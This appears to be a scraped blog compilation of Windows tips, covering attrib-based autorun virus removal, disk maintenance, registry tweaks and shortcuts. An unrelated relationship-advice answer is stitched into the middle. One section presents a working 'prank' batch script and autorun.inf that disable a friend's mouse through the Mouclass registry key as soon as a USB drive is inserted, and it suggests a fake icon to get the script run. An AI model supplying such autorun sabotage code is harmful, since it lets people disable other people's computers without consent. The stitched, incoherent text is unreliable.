How To Delete Virus by Using Command Prompt (CMD)

Microsoft Command Prompt "attrib" is a very useful tool to check if your hard drives even your flashdisks have been infected by a virus.
You will know if a Malware is inside your hard drive just by looking at the attributes of each files and the file that has the attributes of +s +h +r
The function of attrib is to set and remove file attributes (read-only, archive, system and hidden).

Launch attrib
To start attrib
  1. Go to Start Menu > Run
  2. Type cmd (cmd stands for command prompt)
  3. Press Enter key
The Command Prompt will appear showing us where is our location in the directory.

command prompt showing the current location in the directory
Using attrib
To use attrib
  1. Go to the root directory first by typing cd\(because this is always the target of Malware / Virus)
2. Type attrib and press Enter key

after typing attrib, all the attributes of all the files (excluding folders) will be shown
In this example, I have two files that are considered as malware.
Note that there are two files which I outlined in red (SilentSoftech.exe and autorun.inf). Since you cannot see this file nor delete it (because the attributes that was set on these files are +s +h +r)
  1. +s - meaning it is a system file (which also means that you cannot delete it just by using the delete command)
  2. +h - means it is hidden (so you cannot delete it)
  3. +r - means it is a read only file ( which also means that you cannot delete it just by using the delete command)
Now we need to set the attributes of autorun.inf to -s -h -r (so that we can manually delete it)
  1. Type attrib -s -h -r autorun.inf ( be sure to include -s -h -r because you cannot change the attributes using only -s or -h or -r alone)
  2. Type attrib again to check if your changes have been commited
  3. If the autorun.inf file has no more attributes, you can now delete it by typing del autorun.inf
  4. Since SilentSoftech.exe is a malware you can remove its attributes by doing step 1 and step 3(just change the filename) ex. attrib -s -h -r silentsoftech.exe
      a) I typed the attrib command with the -s -h -r setting b) the result after I presse enter                   -autorun.inf has no attributes left
There you have it!!!!
NOTE : when autorun.inf keeps coming back even if you already deleted it, be sure to check your Task Manager by pressing CTRL + ALT + DELETE ( a virus is still running as a process thats why you cannot delete it. KILL the process first by selecting it and clicking End Process.
NOTE: You can also apply the attrib -s -h -r command to all the partition of your computer, drive D: drive E: drive F: (all of your drives). For example. for drive D, just type "D:" (minus the double quote) then you can see that your current drive is D.. type there the command "attrib -s -h -r *.exe" for exe files and "attrib -s -h -r *.inf" and then delete the file by "del autorun.inf".

Hope this work for you guys.....

prevent your computer from virus infection

firstly..prevention is better than cure....so it much worth if you prevent it.r your computer will be heavy with virus infection.

What is a Virus? and why can be infected?
Simply put a Virus is a Malicious Software (MalWare) created by people who wants to destroy.. your files, your computer, your flashdisk...
(NOTE: Virus and Malware will be used in this article interchangeably)
Now, How do there Malware infects your computer?
  • Downloading pornographic materials, games and applications in untrusted websites
  • Downloading files through peer-to-peer programs (e.g. limewire, torrent, ares)
  • inserting your flashdisk to other infected computer and inserting it back to your computer without scanning it first

Ways in preventing Virus infection on your Computer

NOTE: If your Antivirus couldn't delete the malware you can Safe Mode you computer by following this:
  1. Restart your computer
  2. After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually; Instead of Windows loading as normal, the Advanced Options Menu should appear;
  3. Select Run Windows in Safe Mode, then press Enter.
  4. Then scan your computer using an updated Antivirus.
  • SCAN FIRST! Each and everytime you insert a USB drive/flash disk on your computer don't forget to scan it first. (Given that your Antivirus is up-to-date).
  • You can also install utilities that will check the flash disk that you inserted for malware infection. Search it on Major Geeks (this is not an affiliate site)
hope that you can follow this prevention...if virus infect in your computer, you can also delete the virus using Command Prompt <<

what is software?general

Software is a combination of computer programs, commands and information that enables the computer to execute different tasks. In 1958, the term ’software’ was first used by John Turkey. Basically computer software consists of digital languages that involve binary values and direct specific instructions to the computer processor. In simple terms software is what makes the computer usable.

Types of software

Programming software
It is the most common type of computer software worldwide. These are compiled tools and instructions to execute different tasks on computer. A program is a set of commands that enable a computer to undertake certain tasks.

System Software
It is a collection of operating system like device drivers, servers, utilities and windows platform. These systems play a major role in the operating of hardware. There are many brands when it comes to operating systems; Windows and Linux are common examples of it.

Application Software
It is a type of software that allows the computer user to attain specific tasks. Examples of application software are: business software, education software and database software. Apart from these software,  there are other types  including  data backup and recovery software, utility software, accounting software and inventory management just mentioned a few. This software helps a lot in the operation of computers and some of the mentioned examples are discussed below.

Data Backup and Recovery Software
The software do not only offer basic data file copying, but also provides the service of data backup and recovery according to the customization demands by the computer user. This software provides storage and organizes data allowing easy recovery. If you accidently or by mistake lose important data, then the recovery software will come in handy. The software will save your time as you can get relevant results quickly.

Inventory Management Software
For a company that deals with tangible goods, the inventory management software will assist in a great deal. This software is designed to keep track of the stock, be it quantity or quality. It is mostly used in companies’ warehouses. It reduces the expenses of hiring human work force to keep the records for you in bulky paper work.

Utility software
This software is responsible of handling small computer tasks and also known as the service routine. Some of the tasks it performs are; virus scanning and disk defragmenters among others.
A world of computers is impossible to imagine without software. Different tasks cannot be carried out without the presence of computer software. Computers use coded information and are to be served as an effective communication device between the computers and people.

Must have in every PC, Clean file and Registry fix.

CCleaner is an amazing program! It is designed to clean out all the useless temporary files slowing down your system, and to make some minor changes to the Windows registry, getting rid of changed or missing values. I differ with the editor on his review of CCleaner in that you CANNOT accidentally delete programs. Instead, I will tell you it is possible to delete cookies, which is what CCleaner does. If you use a mail service like Yahoo!, it is necessary to go into the options/cookies menu and preserve cookies like Yahoo! and others if you are using an automatic login to any service. It only takes a couple minutes to make this adjustment.

I was amazed the first time I used CCleaner. I have never seen so many temporary files and unnecessary cookies! After using it for about a year, I now install it in any system I build, and I recommend it to all users with a Windows operating system. I have tried many cleaners and all have failed to impress me except this one.

This one is a MUST-HAVE! If you are not yet using CCleaner, I urge you to download/install it now!
Best: updates readily available, easy to install, user-friendly, easy to use GUI, reports all information on files and registry issues found, easy editing of list, automatic settings available.
Worst: Not enough people use CCleaner, and too many fear using this Must-Have utility!usually use both.

there are different hard drives of a computer

What is a hard drive? Often people think a hard drive is their entire computer system as they see it, and others think that it is something hard or solid in the computer. It actually is a storage device inside your computer, and yes, it is hard. . This is hiding inside your computer and is where all your data is stored when you save it. You may never see your hard drive unless you happen to open up your computer to fix a problem. A hard drive is merely one of the many components that contribute to your computer system as a whole.

What is the difference between Hard disk and Hard drive?

It can be confusing when someone is talking about a hard drive and you call “it” a hard disk or hard disk drive. You think to yourself “what are they talking about?” Well this is crazy, but they are talking about the same thing. A hard disk and a hard drive have been made up over the years. Originally the main storage device was called a hard disk and we had floppy disk drives. Eventually the words got mixed up and blended.. That’s my theory anyway.

3.5″ Desktop Hard disk drive:

The picture below shows a 40 gigabyte (the size or capacity) hard drive, 7200RPM (the speed or revs per minute). The 3.5″ hard drive is pictured on the left. We used to only have one option when buying a hard drive, however now there are three or more types to choose from. See more pictures of hard drives.

2.5″ Laptop Hard disk drive:

A laptop hard disk drive is considerably smaller than a normal desktop hard drive and also cost more. If you wanted to buy a 500gb laptop hard drive it would be very expensive, whereas a 500gb desktop hard drive is around $100. See more laptop hard drives.
desktop and laptop hard drive

Cd rom or DVD Drive:

dvd cd disc drive
This is where you put a cd rom or a DVD disc in. It could be a drive that can also read and write on cds or DVD disks. Plain old Cd roms are nearly obsolete as everyone now wants a DVD burner.. With dvd rom drivesyou can backup your dvd’s onto a DVD writeable disc. There is no point buying a cd rom when dvd rom drives are the same price and have more features.

Floppy disk drive:

This is the smaller drive that takes those little plastic square shaped disks. They are rarely used now as they are no longer needed for a boot disk if you have a cd rom or DVD burner. In fact most new computers are sold without a floppy disk drive as they are obselette.
Floppy disc drive Floppy drive

External Hard drive:

An external hard drive can come in two sizes like the desktop hard drive and the laptop hard drive. After all an external hard drive is just a case housing one of these hard drives. So if you have a 2.5″ external hard drive , this means it contains a laptop hard drive.
Now days we every second household owns an external hard drive. They are used to store files on safely away from the computer you are working on. For example, you can save your photos onto an external hard drive and if your computer crashes they will still be safe because they are not stored on your computer. There is no excuse if you do not own one of these fantastic storage devices as you can buy a 1 TB external hard drive for well under $100. That size hard drive can hold thousands of movie, songs, and more… It will store everything.

5 ways to speed up your PC free guide

By following a few simple guidelines, you can maintain your computer and keep it running smoothly. This article discusses how to use the tools available in Windows 7, Vista, and XP Service Pack 3 (SP3) to more efficiently maintain your computer and safeguard your privacy when you're online.

1. Free up disk space

The Disk Cleanup tool helps you free up space on your hard disk to improve the performance of your computer. The tool identifies files that you can safely delete, and then enables you to choose whether you want to delete some or all of the identified files.
Use Disk Cleanup to:
  • Remove temporary Internet files.
  • Remove downloaded program files (such as Microsoft ActiveX controls and Java applets).
  • Empty the Recycle Bin.
  • Remove Windows temporary files such as error reports.
  • Remove optional Windows components that you don't use.
  • Remove installed programs that you no longer use.
  • Remove unused restore points and shadow copies from System Restore.
Tip: Typically, temporary Internet files take the most amount of space because the browser caches each page you visit for faster access later.
To use Disk Cleanup
Window 7 users
  1. Click Start, click All Programs, click Accessories, click System Tools, then click Disk Cleanup. If several drives are available, you might be prompted to specify which drive you want to clean.
  2. When Disk Cleanup has calculated how much space you can free, in the Disk Cleanup for dialog box, scroll through the content of the Files to delete list.
Disk Cleanup dialog boxDisk Cleanup dialog box
  3. Clear the check boxes for files that you don't want to delete, and then click OK.
    • For more options, such as cleaning up System Restore and Shadow copy files, under Description, click Clean up system files, then click the More Options tab.
  4. When prompted to confirm that you want to delete the specified files, click Yes.
After a few minutes, the process completes and the Disk Cleanup dialog box closes, leaving your computer cleaner and performing better.
For Windows XP users
  1. Click Start, point to All Programs, point to Accessories, point to System Tools, and then click Disk Cleanup. If several drives are available, you might be prompted to specify which drive you want to clean.
    Disk Cleanup dialog box
  2. In the Disk Cleanup for dialog box, scroll through the content of the Files to delete list.
Choose the files that you want to delete.
Choose the files that you want to delete.
  3. Clear the check boxes for files that you don't want to delete, and then click OK.
  4. When prompted to confirm that you want to delete the specified files, click Yes.
After a few minutes, the process completes and the Disk Cleanup dialog box closes, leaving your computer cleaner and performing better.

2. Speed up access to data

Disk fragmentation slows the overall performance of your system. When files are fragmented, the computer must search the hard disk when the file is opened to piece it back together. The response time can be significantly longer.
Disk Defragmenter is a Windows utility that consolidates fragmented files and folders on your computer's hard disk so that each occupies a single space on the disk. With your files stored neatly end-to-end, without fragmentation, reading and writing to the disk speeds up.
When to run Disk Defragmenter
In addition to running Disk Defragmenter at regular intervals—monthly is optimal—there are other times you should run it too, such as when:
  • You add a large number of files.
  • Your free disk space totals 15 percent or less.
  • You install new programs or a new version of Windows.
To use Disk Defragmenter:
Windows 7 users
  1. Click Start, click All Programs, click Accessories, click System Tools, and then click Disk Defragmenter.
Click Analyze disk to start the Disk Defragmenter.
Click Analyze disk to start the Disk Defragmenter.
  2. In the Disk Defragmenter dialog box, click the drives that you want to defragment, and then click the Analyze button. After the disk is analyzed, a dialog box appears, letting you know whether you should defragment the analyzed drives.
Tip: You should analyze a volume before defragmenting it to get an estimate of how long the defragmentation process will take.
  3. To defragment the selected drive or drives, click the Defragment disk button. In the Current status area, under the Progress column, you can monitor the process as it happens. After the defragmentation is complete, Disk Defragmenter displays the results.
  4. To display detailed information about the defragmented disk or partition, click View Report.
  5. To close the View Report dialog box, click Close.
  6. You can also schedule the Disk Defragmenter to run automatically, and your computer might be set up this way by default. Under Schedule, it reads Scheduled defragmentation is turned on, then displays the time of day and frequency of defragmentation. If you want to turn off automatic defragmentation or change the time or frequency, click the Configure schedule (or Turn on Schedule, if it is not currently configured to run automatically). Then change the settings, then click OK.
  7. To close the Disk Defragmenter utility, click the Close button on the title bar of the window.
To use Disk Defragmenter:
  1. Click Start, point to All Programs, point to Accessories, point to System Tools, and then click Disk Defragmenter.
Click Analyze disk to start the Disk Defragmenter
Click Analyze disk to start the Disk Defragmenter.
  2. In the Disk Defragmenter dialog box, click the drives that you want to defragment, and then click the Analyze button. After the disk is analyzed, a dialog box appears, letting you know whether you should defragment the analyzed drives.
Tip: You should analyze a volume before defragmenting it to get an estimate of how long the defragmentation process will take.
  3. To defragment the selected drive or drives, click the Defragment button. Note: In Windows Vista, there is no graphical user interface to demonstrate the progress—but your hard drive is still being defragmented.
After the defragmentation is complete, Disk Defragmenter displays the results.
  4. To display detailed information about the defragmented disk or partition, click View Report.
  5. To close the View Report dialog box, click Close.
  6. To close the Disk Defragmenter utility, click the Close button on the title bar of the window.

3. Detect and repair disk errors

In addition to running Disk Cleanup and Disk Defragmenter to optimize the performance of your computer, you can check the integrity of the files stored on your hard disk by running the Error Checking utility.
As you use your hard drive, it can develop bad sectors. Bad sectors slow down hard disk performance and sometimes make data writing (such as file saving) difficult, or even impossible. The Error Checking utility scans the hard drive for bad sectors, and scans for file system errors to see whether certain files or folders are misplaced.
If you use your computer daily, you should run this utility once a week to help prevent data loss.

Run the Error Checking utility:

  1. Close all open files.
  2. Click Start, and then click My Computer.
  3. In the My Computer window, right-click the hard disk you want to search for bad sectors, and then click Properties.
  4. In the Properties dialog box, click the Tools tab.
  5. Click the Check Now button.
  6. In the Check Disk dialog box (called Error-checking in Windows 7), select the Scan for and attempt recovery of bad sectors check box, and then click Start.
Check Disk Local Disk dialog box, with the Scan

for and attempt recovery of bad sectors check box selected.
Example of Check Disk Local Disk dialog box
  7. If bad sectors are found, choose to fix them.
Tip: Only select the "Automatically fix file system errors" check box if you think that your disk contains bad sectors.

4. Protect your computer against spyware
Spyware collects personal information without letting you know and without asking for permission. From the websites you visit to usernames and passwords, spyware can put you and your confidential information at risk. In addition to privacy concerns, spyware can hamper your computer's performance. To combat spyware, you might want to consider using the PC safety scan from Windows Live OneCare. This scan is a free service and will help check for and remove viruses.

Answer:
Have you talked about this already? You have been together for three years and that is a lot of time already. Why is she still communicating with her ex-boyfriend? In that span of time, everything about them should have been left in the past already and if there is something that should be settled, it should have been settled already or if it isn't, I don't think that it is still worth settling to the point of really seeing each other. I would like to ask if you trust her but with the looks of it, I don't think that you really do. In fact, if I myself is in your situation, I would really feel so bad about it too but at the same time, I'd think of things that could put a stop to it and save our relationship.

The very first thing that I would do is to tell her about what I feel and what's on my mind about the situation. Sure I'm not comfortable with it and I would tell her that. Ask her any reasons why is she still communicating with her ex-boyfriend. If she can't give you a straight or somewhat logical answer, there's really something wrong somewhere. However, if she values your relationship and understand your side, she will stop it or either explain to you clearly as to why is she meeting her ex-boyfriend still. People who are lying normally can't give straight answers out and they are inconsistent with their thoughts.

If your girlfriend values you and your relationship, she might do either of these. First, she'll decide not to meet her ex-boyfriend and even stop communicating with him for the sake of your relationship. Second is that, should she have something important to give to her ex-boyfriend, she will keep and limit it up to that and nothing else.

However, some fears are unfounded and they don't turn out to be real. Maybe you're just thinking too much and getting paranoid about the situation but who knows, your girlfriend won't give in to anything that could destroy your relationship. Just trust her and let her assure you (and you too, assure her) that she will remain loyal and faithful to you.

Disable Your Friend’s Mouse Whenever USB Disk Is Inserted

Batch scripting is really easy and so much a fun. You can learn and imagine so many things from batch and shell scripting.

In this short time pass tutorial, I am going to show you how to disable your friend’s mouse whenever your USB drive is inserted.

To get this feature working, you must make sure that your friend has not disabled autorun for removable media. However you may get this to work by creating a fake icon for the batch program.

As we did with our previous tutorial about copying files automatically, we’ll be using same principle here. First we’ll create a batch file and then we’ll be creating autorun.inf file. Then we’ll be pasting it in the root of USB drive. Now whenever the USB drive is inserted, system will look for autorun.inf. Autorun.inf will execute that batch file disabling the mouse.

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Copy the above code in notepad and save it as “filename.bat”

The above code will disable the mouse by deleteing the registry key of Mouclass and again adds data = 0×00000004 to the valuename = “Start”

Note: The above image is only demonstrates where the action will be taken by the above batch script. It has to do nothing with the procedure of this tutorial.

[autorun]
Open=filename.bat
Action=Mouse Disable

The above code goes for autorun.inf. Open notepad, copy and paste the above code in it and save it as “autorun.inf”.

Now copy both of the file in your or your friend’s USB drive. Then let it do the magic.

To re-enable the mouse you’ll just have to change the value 0×00000004 to 0×00000001. To do so, simply create another batch file with following script:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

Change Windows Logon Screen, IE8's Title Bar, and Aero Snap

1. Change Your Logon Screen Background
Changing the wallpaper on your desktop is one of the easiest things to do in Windows. But if you can have that display any image you want, why not do the same with your logon screen?
1. Navigate to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Authentication\LogonUI\Background.
2. Find the "OEMBackground" key; or right-click in the right pane and select "New," then "DWORD (32-bit) Value" to create it (and then give it that name).
3. Double-click on "OEMBackground" to open it.
4. Change the value in the "Value data" field to 1.
5. Click OK.
6. Using Windows Explorer, navigate to your Windows directory, then System32\oobe. If there's a folder in here called "info," go into it; if there's a folder inside of that one called "backgrounds," go into that. If neither exists, you'll need to create them both first.
7. Copy the image (it must be a JPEG, and smaller than 256KB in size) you want to use as your logon screen background into the info\backgrounds folder.
8. Rename the image backgroundDefault.jpg. (Note: If you choose an image that's sized differently than your desktop and you change your resolution, it will be adjusted to fit—with a possible loss in quality. The info\background folder also supports 12 other files of specific resolutions. The files should be named backgroundXXXXX.jpg, where the XXXXX is one of the following: 900x1440, 960x1280, 1024x1280, 1280x1024, 1024x768, 1280x960, 1600x1200, 1440x900, 1920x1200, 1280x768, or 1360x768. For example, background1920x1200.jpg will be used at 1,920-by-1,200 resolution, and so on.)
The next time you restart your computer, or log out, you'll see this image as the new logon screen. If you chose an image that prevents the buttons and text from looking their best on the logon screen, you can adjust their appearance as well.
1. Navigate back to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Authentication\LogonUI (you're not going into Background this time).
2. Add a DWORD value called "ButtonSet."
3. Change its value to either 1 (darker text shadows and lighter buttons, intended for lighter backgrounds) or 2 (no text shadows and opaque buttons, for darker backgrounds); 0 is the Windows default.

7 Windows 7 Registry Hacks - IE8 Title Bar
2. Personalize the IE8 Title Bar
If you use Internet Explorer 8 in Windows 7, you're probably familiar with the browser's title bar, which appends "Windows Internet Explorer" to the end of every page name. Why not change it to something a little more... you?
1. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main.
2. Right-click in the right panel, click "New," and then select "String Value."
3. Name the string value you just created "Window Title" (space included).
4. Double-click on Window Title.
5. Type your personalized title in the "Value data" field.
6. Click OK.

3. Turn Off Aero Snap
Implemented as an easier way to arrange windows on your desktop, Aero Snap will automatically maximize a window if you drag it to the top of the screen, or resize a window to use exactly half your display's width if you drag it all the way to the left or the right. If you don't find this feature convenient, you can disable it.
1. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
2. Scroll down to "WindowArrangementActive" in the right-hand pane, and double-click it to open it.
3. Change the number in the "Value data" field from 1 (Aero Snap is enabled) to 0.
4. Click OK.

Taskbar Tweaks

4. Change Taskbar Button Stacked Window Behavior
By default, the Taskbar groups together multiple windows of a single app, then displays all of them as thumbnails when you click on the program's Taskbar icon. If you think it would be more handy to have Windows automatically open the last window when you click the icon, you can make that happen.
1. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\Advanced.
2. Right-click in the right pane, and select "New" then "DWORD (32-bit) Value."
3. Rename the new DWORD value "LastActiveClick."
4. Double-click on LastActiveClick to open it.
5. Change the value in the "Value data" field to 1.
6. Click OK.

7 Windows 7 Registry Hacks - Taskbar Buttons
5. Change the Width of Taskbar Buttons
Windows 7 is set up to always combine Taskbar buttons from the same program and never display their labels. If, however, you've changed the setting to either not combine the windows at all or to only combine them when the Taskbar is full, you can change the icons' width to hide the labels there, too. Here's how.
1. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
2. Scroll to find the "MinWidth" entry. If it's not there, you'll have to create it yourself. Right-click in the right pane, select New, then Select "String Value," and name the object MinWidth.
3. Double-click MinWidth to open it.
4. Change the number in the "Value Data" field the width you want to allot to the icons. With the default small buttons, 38 is sufficient; with the larger icons, you'll want about 52.
5. Click OK.

6. Change the Delay Time of Taskbar Previews
Among the cooler features in Windows 7 are Taskbar previews, which appear when you hover the mouse cursor over the Taskbar icon of a currently running program. But when you do this, the preview doesn't appear immediately. Luckily, it's easy to speed it up (r, for whatever reason, slow it down.
1. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\Advanced
2. Right-click in the right pane, click "New," and click "DWORD Value" or "DWORD (32-bit) Value."
3. Name the new DWORD "ExtendedUIHoverTime."
4. Double click on ExtendedUIHoverTime to open it.
5. Click the "Decimal" radio button in the "Base" section. In the "Value data" field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 400ms.)
6. Click "OK" to commit the change.
When you hover the mouse cursor over one of the previews, all your other windows will disappear and show just that window. There's a delay associated with this, too. To change this, add a new DWORD in the same location called "ThumbnailLivePreviewHoverTime," and edit it the same way as above, setting its value to whatever you want (in ms).

7. Change the Delay Time of Aero Peek
Aero Peek is Windows 7's sleeker replacement for the old Show Desktop button. Just move your mouse cursor over the icon at the right end of the Taskbar to turn all your Windows invisible. But this, too, has a delay time associated with it, so if you find yourself accidentally activating it too often, you may want to increase the delay time. Here's how.
1. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\Advanced
2. Right-click in the right pane, click "New," and click "DWORD Value" or "DWORD (32-bit) Value."
3. Name the new DWORD "DesktopLivePreviewHoverTime."
4. Double click on DesktopLivePreviewHoverTime to open it.
5. Click the "Decimal" radio button in the "Base" section. In the "Value data" field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 1,000ms.)
6. Click "OK" to commit the change.

12 Windows 7 Shortcuts

Taskbar Shortcuts

Scroll through taskbar icons. Want to cycle through all the programs you have open without calling up Flip3D (with Windows key+Tab, in case you'd forgotten)? Windows key+T will guide you through all of your open programs and let you see their window thumbnails, but won't change what the rest of the screen is showing.

Start a new instance of an app. Changes made to the taskbar mean that clicking on a program icon placed there won't automatically start up a new instance of it. Instead, clicking will just show you what windows of it you already have open. But if you Shift-click or click the middle mouse button on a program's taskbar icon, you can start up another instance.

Start an elevated instance of an app. You can run a program with administrative credentials even if you're not logged into an administrator-level account. Shift-Ctrl-click on a taskbar icon to open an elevated instance of that app.

Close a taskbar thumbnail. There's a red X icon in the upper-right corner of each taskbar thumbnail window that you can use to close that window. Want an even quicker way? Click the middle mouse button on it.

Restore the last active window. New taskbar groupings make it easier than ever to organize the programs you have open in Windows 7. But there's a way to speed up the process even more. Ctrl-click on a taskbar group to open the last active window in that group. Keep clicking to cycle through all the windows you have open.

Open a Jump List. One of the most helpful new features of Windows 7 are Jump Lists, which give you instant access to frequently used commands. There are two ways top open them: Either right-click on a taskbar icon, or left-click and drag it upward.

Arrange windows with Snap. Windows 7's new Snap capability lets you arrange your windows in several cool ways, depending on where you drag them on the screen. But you need your mouse. With any open window, hold down the Windows key and then press an arrow key to cause the appropriate Snap behavior. Use Windows key + Up Arrow to maximize the window; Windows key + Left Arrow or Right Arrow to make the window fill either the left or right half of the screen; or use Windows key + Down Arrow to minimize the window, or restore it to its original size if it's been maximized.

Make all open windows invisible. With Aero Peek, moving the mouse pointer to the lower-right corner of the taskbar will make all your open windows turn invisible so you can see straight through to your desktop. To do this without your mouse, press Windows key+space bar.

Minimize all but the active window. Sometimes the best way to clear your head is by clearing your desktop of everything except what you're looking at. This is easy to do in Windows 7: Hit Windows key+Home to minimize every window except the one that's currently active.

Move a window to another display. Multiple-display setups can be a great convenience, but arranging your windows between them is sometimes challenging. Not in Windows 7. Hold down Shift and the Windows key with either the Left or Right Arrow key to send the window automatically to the display (or projector) in that position.

Use the magnifier. If you're having trouble seeing portions of the screen, whether because of vision problems or because you're running at too high a resolution for a specific task, pressing Windows key+Plus key will start up Windows' magnifier option and let you zoom in on your display. To make everything look smaller again when you're finished, hit Windows key+Minus key.

Set projection options. If you're using your Windows 7 PC with a projector, you can easily change your display options by hitting Windows key+P. You'll be given choices to display on just your computer or just the projector, show the same thing on both, or extend your projection.
